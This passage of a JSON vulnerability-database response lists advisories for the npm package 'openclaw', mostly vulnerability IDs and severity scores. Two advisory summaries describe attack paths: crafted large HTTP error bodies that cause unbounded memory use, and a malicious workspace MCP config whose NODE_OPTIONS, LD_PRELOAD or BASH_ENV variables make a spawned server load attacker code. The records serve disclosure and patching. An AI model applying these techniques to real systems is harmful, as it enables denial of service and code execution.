-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulner
ability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulner
ability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulner
ability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-p6j4-wvmc-vx2h"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rf6b-q7cj-jbgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89057?format=json","vulnerability_id":"VCID-rkx2-eq2x-q7d1","summary":"Duplicate Advisory: OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-4qwc-c7g9-4xcw. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unbounded memory allocation vulnerability in remote media HTTP error handling that allows attackers to trigger excessive memory consumption. 
Attackers can send crafted HTTP error responses with large bodies to remote media endpoints, causing the application to allocate unbounded memory before failure handling occurs.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA
:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35633"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses"},{"reference_url":"https://github.com/advisories/GHSA-hm63-vwj4-mj2q","reference_id":"GHSA-hm63-vwj4-mj2q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hm63-vwj4-mj2q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn
"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9
"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6
"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv
"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj
"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-hm63-vwj4-mj2q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rkx2-eq2x-q7d1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89604?format=json","vulnerability_id":"VCID-rr6t-1193-ybgz","summary":"OpenClaw: MCP stdio server env could load dangerous startup variables from workspace config\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace MCP stdio configuration could pass dangerous process-startup environment variables such as `NODE_OPTIONS`, `LD_PRELOAD`, or `BASH_ENV` to the spawned MCP server process. In a malicious workspace, this could make the MCP child load attacker-controlled code when the operator starts a session that uses that MCP server.\n\nThe impact is limited to local/workspace trust boundaries and requires the operator to run OpenClaw in a workspace containing the malicious MCP configuration. 
Severity is therefore medium, not high/critical.\n\n## Fix\n\nOpenClaw now filters MCP stdio environment entries through the host environment safety denylist before spawning stdio MCP servers.\n\nFix commits:\n\n- `62fa5071896e95edc7f67d1cebc70a2859e283af`\n- `85d86ebc4bf3d2226d39d132a484f4f7a299fa1b`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44995","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01944","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01954","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01946","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44995"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/62fa5071896e95edc7f67d1cebc70a2859e283af","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://github.com/openclaw/openclaw/c
ommit/62fa5071896e95edc7f67d1cebc70a2859e283af"},{"reference_url":"https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/"}],"url":"https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scorin